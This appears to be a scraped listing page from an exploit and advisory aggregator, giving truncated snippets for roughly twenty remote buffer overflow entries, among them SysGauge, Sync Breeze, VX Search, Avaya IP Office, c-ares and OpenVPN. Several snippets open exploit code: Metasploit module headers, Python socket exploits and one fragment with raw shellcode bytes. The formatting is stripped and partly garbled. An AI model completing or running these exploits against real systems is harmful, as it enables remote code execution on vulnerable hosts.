The vulnerability of the ares_parse_naptr_reply function in the asynchronous DNS request library c-ares allows a attacker to perform reading beyond the buffer limit in memory.

The vulnerability of the aresparsenaptrreply function in the asynchronous DNS request library c-ares is related to incorrect data processing during the analysis of NAPTR responses. Exploiting this vulnerability can allow a malicious actor, operating remotely, to trigger buffer overflow attacks by...

SysGauge Server 3.6.18 - Remote Buffer Overflow

Exploit Title: SysGauge Server 3.6.18 - Buffer Overflow Exploit Author: Ahmad Mahfouz Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH Contact: http://twitter.com/eln1x Date: 12/01/2018 CVE: CVE-2018-5359 Version: 3.6.18 Tested on: Windows 7 x64 Software Link:...

ALLMediaServer 0.95 - Remote Buffer Overflow (Metasploit)

ALLMediaServer 0.95 - Remote Buffer Overflow Metasploit require 'msf/core' class Metasploit4 'ALLMediaServer 0.95 Buffer Overflow', 'Description' = %q This module exploits a stack buffer overflow in ALLMediaServer 0.95. The vulnerability is caused due to a boundary error within the handling of HT...

ALLMediaServer 0.95 - Remote Buffer Overflow (Metasploit)

require 'msf/core' class Metasploit4 'ALLMediaServer 0.95 Buffer Overflow', 'Description' = %q This module exploits a stack buffer overflow in ALLMediaServer 0.95. The vulnerability is caused due to a boundary error within the handling of HTTP request. , 'License' = MSFLICENSE, 'Author' = 'Anurag...

LabF nfsAxe FTP Client 3.7 - Remote Buffer Overflow (DEP Bypass)

!/usr/bin/env python Exploit Title : LabF nfsAxe 3.7 FTP Client DEP Bypass Date : 12/8/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html Software link : http://www.labf.com/download/nfsaxe.exe Version : 3.7 Tested on : Windows 7 x86 Description : Upon...

SUSE-SU-2017:3177-1 Security update for openvpn-openssl1

This update for openvpn-openssl1 fixes the following issues: Security issue fixed: - CVE-2017-12166: Fix remote buffer overflow bsc1060877...

Avaya OfficeScan (IPO) SoftConsole Remote SEH Buffer Overflow Exploit

Exploit for windows platform in category remote exploits + Credits: John Page aka hyp3rlinx Vendor: ============= www.avaya.com Product: =========== Avaya IP Office IPO v9.1.0 - 10.1 IP Office is Avaya's global midsize solution for enterprises, supporting up to 3,000 users at a single location wi...

MIT krb5 Remote Buffer Overflow Vulnerability

Kerberos is a widely used, super-strong encryption to authenticate client-side and server-side network protocols. MIT krb5 suffers from a remote buffer overflow vulnerability in its implementation, which can be exploited by an attacker to execute arbitrary code in the current user context...

Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)

/ Sync Breeze Enterprise BOF - Ivan Ivanovic Ivanov Иван-дурак недействительный 31337 Team / define WINSOCKDEPRECATEDNOWARNINGS define DEFAULTBUFLEN 512 include include include include DWORD SendRequestchar request, int requestsize WSADATA wsa; SOCKET s; struct sockaddrin server; char...

SUSE-SU-2017:2839-1 Security update for openvpn

This update for openvpn fixes the following issues: - CVE-2017-12166: Lack of bound check in readkey in old legacy key handling before using values could be used for a remote buffer overflow bsc1060877...

Sync Breeze Enterprise 10.1.16 - 'POST' Remote Buffer Overflow

!/usr/bin/python import socket try: print "\nSending evil buffer..." shellcode = "\xba\x31\x13\x39\xe4\xdb\xd3\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" "\x52\x31\x56\x12\x03\x56\x12\x83\xdf\xef\xdb\x11\xe3\xf8\x9e" "\xda\x1b\xf9\xfe\x53\xfe\xc8\x3e\x07\x8b\x7b\x8f\x43\xd9\x77"...

Sync Breeze Enterprise 10.1.16 - Remote Buffer Overflow (SEH) (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'SyncBreeze v10.1.16 SEH GET Overflow', 'Description' = %q There exists an unauthenticated SEH based vulnerability in the HTTP...

VX Search Enterprise 10.1.12 - Remote Buffer Overflow

VX Search Enterprise 10.1.12 - Remote Buffer Overflow !/usr/bin/env python Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow Exploit Author : Revnic Vasile Email : revnicatgmaildotcom Date : 09-10-2017 Vendor Homepage : http://www.flexense.com/ Software Link :...

VX Search Enterprise 10.1.12 - Remote Buffer Overflow

!/usr/bin/env python Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow Exploit Author : Revnic Vasile Email : revnicatgmaildotcom Date : 09-10-2017 Vendor Homepage : http://www.flexense.com/ Software Link : http://www.vxsearch.com/setups/vxsearchentsetupv10.1.12.exe Version :...

Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow

Exploit Title: SyncBreeze POST username overflow Date: 30-Sep-2017 Exploit Author: Owais Mehtab Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.0.28.exe Version: 10.0.28 Tested on: Windows 7 !/usr/bin/python import socket import os...

haneWIN DNS Server 1.5.3 - Remote Buffer Overflow (Metasploit)

require 'msf/core' class MetasploitModule 'haneWIN DNS Server Buffer Overflow', 'Description' = %q This module exploits a buffer overflow vulnerability found in haneWIN DNS Server 'james fitts' , 'License' = MSFLICENSE, 'References' = 'EDB', '31260' , 'OSVDB', '102773' , 'Privileged' = false,...

Lockstep Backup for Workgroups 4.0.3 - Remote Buffer Overflow (Metasploit)

require 'msf/core' class MetasploitModule 'Lockstep Backup for Workgroups %q This module exploits a stack buffer overflow found in Lockstep Backup for Workgroups 'james fitts' , 'License' = MSFLICENSE, 'Version' = '$Revision: $', 'References' = 'URL', 'http://secunia.com/advisories/50260/' ,...

Sielco Sistemi Winlog 2.07.16 - Remote Buffer Overflow (Metasploit)

Sielco Sistemi Winlog 2.07.16 - Remote Buffer Overflow Metasploit require 'msf/core' class MetasploitModule 'Sielco Sistemi Winlog %q This module exploits a stack based buffer overflow found in Sielco Sistemi Winlog 'James Fitts' , 'License' = MSFLICENSE, 'Version' = '$Revision: $', 'References' ...

Gh0st Client (C2 Server) - Remote Buffer Overflow (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'zlib' class MetasploitModule 'Gh0st Client buffer Overflow', 'Description' = %q This module exploits a Memory buffer overflow in the Gh0st client C2 server ,...

The vulnerability of the SIP component of the Android operating system from the CAF repository, which allows a attacker to trigger buffer overflows.

The vulnerability of the SIP component of the Android operating system from the CAF repository is related to shortcomings in string processing the absence of a zero-terminated string. Exploiting this vulnerability can allow an attacker, acting remotely, to cause buffer overflows...